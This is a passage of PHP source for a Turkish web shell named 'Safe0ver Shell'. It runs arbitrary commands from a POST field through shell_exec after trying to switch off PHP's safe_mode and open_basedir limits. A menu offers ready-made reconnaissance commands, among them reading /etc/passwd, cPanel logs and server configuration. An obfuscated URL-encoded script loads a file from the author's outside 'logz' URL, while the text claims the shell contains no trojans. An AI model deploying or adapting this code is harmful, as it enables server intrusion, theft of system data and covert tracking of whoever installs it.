  817. else {
  818. $olddir = "$lastdir/";
  819. }
  820. $fpos = strrpos($oldfile, "/");
  821. if (strval($fpos)!="") {
  822. $inputfile = substr($oldfile, $fpos+1);
  823. }
  824. else {
  825. $inputfile = "";
  826. }
  827. echo "<center><table><tr><td><form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
  828. echo "<input type=\"hidden\" name=\"cmd\" value=\"ren\">\n";
  829. echo "<input type=\"hidden\" name=\"oldfile\" value=\"$oldfile\">\n";
  830. echo "<input type=\"hidden\" name=\"olddir\" value=\"$olddir\">\n";
  831. echo "<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">\n";
  832. echo "<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">\n";
  833. echo "Rename \"$oldfile\" to:<br>\n";
  834. echo "<input size=\"100\" type=\"text\" name=\"newfile\" value=\"$inputfile\"><br><input type=\"submit\" value=\"Rename\">";
  835. echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input type=\"submit\" value=\"Cancel\"></form>";
  836. echo "</td></tr></table></center>";
  837. }
  838. }
  839. else if ( $cmd == "con") {
  841. ?>
  842. <center>
  843. <table>
  844. <tr><td>&nbsp;</td>
  845. </tr></table>
  846. <?php
  847. }
  848. else { /* <!-- There is a incorrect or no parameter specified... Let's open the main menu --> */
  849. $isMainMenu = true;
  850. ?>
  851. <table width="100%" border="0" cellpadding="0" cellspacing="0">
  852. <tr>
  853. <td width="100%" class="border">
  854. <center>&nbsp;-<[{ <?php echo $scriptTitle ?> Main Menu }]>-&nbsp;</center>
  855. </td>
  856. </tr>
  857. </table>
  858. <br>
  859. <center>
  860. <table border="0" NOWRAP>
  861. <tr>
  862. <td valign="top" class="silver border">
  863. <?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>##Safe0ver##</strong></font>", "cmd=dir&dir=.").sp(2); ?> </td>
  864. <td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP><span class="style5"> Safe0ver Shell Piyasada Bulunan Bir Cok Shell'in Kodlarindan(c99,r57 vs...) Sentezlenerek Kodlanmistir.Entegre Olarak Bypass �zelligi Eklenmis Ve B�ylece Tahrip G�c� Y�kseltilmistir.Yazilimimiz Hic bir Virus,worm,trojan gibi Kullaniciyi Tehdit Eden Veya S�m�ren yazilimlar Icermemektedir.<p>--------------------------<p>Bypass Kullan�m:<b>Cat /home/evilc0der/public_html/config.php</b> Gibi Olmalidir.<br>
  865. </span></td>
  866. </tr>
  867. </table>
  868. <br><p><br>Safe Mode ByPAss<p><form method="POST">
  869. <p align="center"><input type="text" size="40" value="<? if($_POST['dizin'] != "") { echo $_POST['dizin']; } else echo $klasor;?>" name="dizin">
  870. <input type="submit" value="�alistir"></p>
  871. </form>
  872. <form method="POST">
  873. <p align="center"><select size="1" name="dizin">
  874. <option value="uname -a;id;pwd;hostname">Sistem Bilgisi</option>
  875. <option value="cat /etc/passwd">cat /etc/passwd</option>
  876. <option value="cat /var/cpanel/accounting.log">cat /var/cpanel/accounting.log</option>
  877. <option value="cat /etc/syslog.conf">cat /etc/syslog.conf</option>
  878. <option value="cat /etc/hosts">cat /etc/hosts</option>
  879. <option value="cat /etc/named.conf">cat /etc/named.conf</option>
  880. <option value="cat /etc/httpd/conf/httpd.conf">cat /etc/httpd/conf/httpd.conf</option>
  881. <option value="netstat -an | grep -i listen">A�ik Portlar</option>
  882. <option value="ps -aux">�alisan Uygulamalar</option>
  883. </select> <input type="submit" value="�alistir"></p>
  884. </form>
  885. ------------------------------------------------------------------------------------<p>
  886. <?
  887. $evilc0der=$_POST['dizin'];
  888. if($_POST['dizin'])
  889. {
  890. ini_restore("safe_mode");
  891. ini_restore("open_basedir");
  892. $safemodgec = shell_exec($evilc0der);
  893. echo "<textarea rows=17 cols=85>$safemodgec</textarea>";
  894. }
  895. ?>
  896. <Script Language='Javascript'>
  897. <!-- HTML Encryption provided by -->
  898. <!--
  899. document.write(unescape('%3C%68%74%6D%6C%3E%3C%62%6F%64%79%3E%3C%53%43%52%49%50%54%20%53%52%43%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%65%76%69%6C%63%30%64%65%72%2E%6F%72%67%2F%6C%6F%67%7A%2F%79%61%7A%2E%6A%73%3E%3C%2F%53%43%52%49%50%54%3E%3C%2F%62%6F%64%79%3E%3C%2F%68%74%6D%6C%3E'));
  900. //-->
  901. </Script>
  902. </center>
  903. <br>
  904. <?php
  905. }
  907. if ($cmd != "downl") {
  908. if ( $isMainMenu != true) {
  909. ?>
  911. <table width="100%" border="0" cellpadding="0" cellspacing="0">
  912. <tr>
  913. <td width="100%" style="class="silver border">
  914. <center><strong>
  915. &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;Main Menu&nbsp;] </font>", "cmd=&dir="); ?>&nbsp;&nbsp;
  916. &nbsp;&nbsp;&nbsp;&nbsp;
  917. &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;R00T&nbsp;] </font>", "cmd=dir&dir=."); ?> &nbsp;&nbsp;
  918. </strong></center>
  919. </td>
  920. </tr>
  921. </table>
  922. <br>
  923. <?php
  924. }
  925. ?>
  926. <table width=100% border="0" cellpadding="0" cellspacing="0">
  927. <tr>
  928. <td width="100%" class="silver border">
  929. <center>&nbsp;<?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?>&nbsp;</center>
  930. </td>
  931. </tr>
  932. </table>
  933. </td>
  934. </tr>
  935. </table>
  937. <?php
  938. }
  940. ?>
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